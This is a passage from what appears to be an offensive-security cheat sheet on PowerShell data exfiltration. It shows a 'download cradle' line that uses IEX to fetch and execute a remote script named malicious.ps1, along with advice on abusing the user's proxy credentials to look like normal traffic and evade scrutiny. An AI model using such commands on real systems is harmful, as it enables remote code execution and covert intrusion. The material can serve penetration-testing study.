64nYm3d3/CheatSheet/Languages/Powershell/data_exfil.md

 IEX $wc.DownloadString("https://s3bucket.amazonaws.com/malicious.ps1")
 ~~~

 In this instance we are taking the logged in user's credentials and using the proxy, not just bypassing it, using it, which is great!
 We look like a normal web user and unless we're under scrutiny, we look like a normal user.

+#### Download Cradles
 When we use powershell (or any language) to download a file, it's called a "download cradle"

 Typical download cradles look like this:
 ~~~